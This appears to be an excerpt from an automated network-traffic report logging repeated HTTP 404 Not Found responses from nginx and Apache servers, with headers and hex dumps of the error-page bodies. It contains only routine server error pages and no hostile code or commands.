Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:30:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 14:30:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 14:30:43 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 14:30:46 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 14:30:48 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 14:30:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 09 Oct 2024 14:31:05 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-10-09T14:31:10.0836950Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 14:31:10 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 14:31:13 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 14:31:15 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,\|hEKZ{XtAo[Y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Wed, 09 Oct 2024 14:31:18 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 